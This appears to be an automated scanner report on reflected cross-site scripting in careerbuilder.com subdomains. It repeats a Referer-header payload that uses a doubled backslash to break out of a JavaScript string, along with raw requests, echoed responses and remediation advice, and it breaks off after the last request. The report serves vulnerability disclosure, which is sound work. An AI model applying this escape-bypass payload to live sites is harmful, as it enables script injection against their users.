HTTP/1.1 200 OK Cache-Control: private Content-Length: 176971 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=16c9edd4c01546239483fde8e118e676-343071061-RK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6502AE2EC89049FE61B8D06E0BA241D3A6963116C55DAC1DC814B322D4EF5C7361F316551F65B2FC7DF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:00 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:00 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL20 Date: Sun, 14 Nov 2010 22:31:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ead14\\';alert(1)//d413ee6966c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb97d\'%3balert(1)//f3a52270f98 was submitted in the Referer HTTP header. This input was echoed as cb97d\\';alert(1)//f3a52270f98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /it.ic/Florida_Miami/ HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cb97d\'%3balert(1)//f3a52270f98
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176751 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=902c2859023d4db993b8e5e2a6697115-343070917-R3-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508F9889AF47863D42AC9369BF24936EF407DF4271B01B26D33803D513D96BBE0478F239CD3F405291; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:37 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:37 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL3 Date: Sun, 14 Nov 2010 22:28:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cb97d\\';alert(1)//f3a52270f98'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe7d2\'%3balert(1)//c40eaec362e was submitted in the Referer HTTP header. This input was echoed as fe7d2\\';alert(1)//c40eaec362e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1 Host: jobs.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fe7d2\'%3balert(1)//c40eaec362e
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176478 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=25a99fa3ee1e4b068b7ec2cbf7fe3815-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6507146EA23E1EE4D40D495C0361180028DB68A4C29FAD7CFD6464B7AB86D58CEB3EBF9D3F54C7C4D94; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:37:34 GMT; path=/; HttpOnly Set-Cookie: CB%5FSID=dc7797b2bcdc4ccb9a686a999cbfe5f2-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: CB%5FSID=8fea24ddd8f7452a8758fec70cec2714-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL20 Date: Sun, 14 Nov 2010 23:37:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='AL Subdomain Home'; s_cb.eVar8='JS_FindJobs - AL Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - fe7d2\\';alert(1)//c40eaec362e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7fbe\'%3balert(1)//3fcc9d2eabf was submitted in the Referer HTTP header. This input was echoed as b7fbe\\';alert(1)//3fcc9d2eabf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: jobs.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b7fbe\'%3balert(1)//3fcc9d2eabf
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176477 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=aebbe70ee63c4ced8fe0e208d06bf35f-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501B089DA72A0005D0B8E47569FB31A1945722B260FB3506C12EC3E1CE7BF29FBDB2FCC225D178F5E1; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:27:55 GMT; path=/; HttpOnly Set-Cookie: CB%5FSID=0651d37f3ffb493d8961c54df23d4579-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: CB%5FSID=b03a40ffb5014396a48a2ab60cb91d59-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL9 Date: Sun, 14 Nov 2010 23:27:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='AL Subdomain Home'; s_cb.eVar8='JS_FindJobs - AL Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b7fbe\\';alert(1)//3fcc9d2eabf'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60f15\'%3balert(1)//c9c3d8aec71 was submitted in the Referer HTTP header. This input was echoed as 60f15\\';alert(1)//c9c3d8aec71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /mf.ic/Florida_Miami/ HTTP/1.1 Host: manufacturing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=60f15\'%3balert(1)//c9c3d8aec71
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186571 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=588ed3a3eebd48419950da291a0383c2-343070951-R9-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650D324AD14344277ED63E6781CC905D350A303A6132AE0CBF923142E49567A6DB226732C2A4EF40C28; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:11 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:11 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL9 Date: Sun, 14 Nov 2010 22:29:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 60f15\\';alert(1)//c9c3d8aec71'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfccf\'%3balert(1)//9972b559a7f was submitted in the Referer HTTP header. This input was echoed as dfccf\\';alert(1)//9972b559a7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh043 HTTP/1.1 Host: manufacturing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=dfccf\'%3balert(1)//9972b559a7f
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186474 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=21df41c5afa04de9ac04dff709cb2d3e-343071075-R4-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650301ED01A93EF6559ED7ACAFEC8518CD1A9AB47289EC5881D3AA44E4265EED81F9B3327CC9B792055; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:15 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:15 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL4 Date: Sun, 14 Nov 2010 22:31:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - dfccf\\';alert(1)//9972b559a7f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a713\'%3balert(1)//b6db130f670 was submitted in the Referer HTTP header. This input was echoed as 1a713\\';alert(1)//b6db130f670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1 Host: mobile.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1a713\'%3balert(1)//b6db130f670
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10195 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=44ffd6fd30b5426294f50f347da3ea77-343074508-wv-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501E74DD28BB2FDB86C7DE8DDCD088A38DE5495471E11E6080678C00B6CD9DA9D7691FE84FF856E38E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:28:28 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR32 Date: Sun, 14 Nov 2010 23:28:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> CB Mob ...[SNIP]... er='mobile'; s_cb.eVar8='mobile.careerbuilder.com/mobile/default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1a713\\';alert(1)//b6db130f670'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b672d\'%3balert(1)//d2889a1bdcb was submitted in the Referer HTTP header. This input was echoed as b672d\\';alert(1)//d2889a1bdcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: mobile.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b672d\'%3balert(1)//d2889a1bdcb
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10195 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=ad0e098b90d04d38bdc5cbc3f02c23ca-343074478-wr-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500A0F5D4F325594E4B7B56963AD6EE6F549E5CC1E6AB077ADEA07FC19A20D2AF73C46F21CFED20949; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:27:57 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR28 Date: Sun, 14 Nov 2010 23:27:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> CB Mob ...[SNIP]... er='mobile'; s_cb.eVar8='mobile.careerbuilder.com/mobile/default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b672d\\';alert(1)//d2889a1bdcb'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39b7f\'%3balert(1)//fd1e68bc403 was submitted in the Referer HTTP header. This input was echoed as 39b7f\\';alert(1)//fd1e68bc403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /np.ic/Florida_Miami/ HTTP/1.1 Host: nonprofit.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=39b7f\'%3balert(1)//fd1e68bc403
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 178511 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=d193d2da2f994068ae657613801ae0a8-343071124-w3-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650FB3E98C5C6ACE11D9685489390208AED573FA9BEA306C08C8D484265D82B21A041C676380FDD7F8C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:03 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:04 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR3 Date: Sun, 14 Nov 2010 22:32:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 39b7f\\';alert(1)//fd1e68bc403'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 894b3\'%3balert(1)//7ba9f980d81 was submitted in the Referer HTTP header. This input was echoed as 894b3\\';alert(1)//7ba9f980d81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh044 HTTP/1.1 Host: nonprofit.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=894b3\'%3balert(1)//7ba9f980d81
Response (redirected)
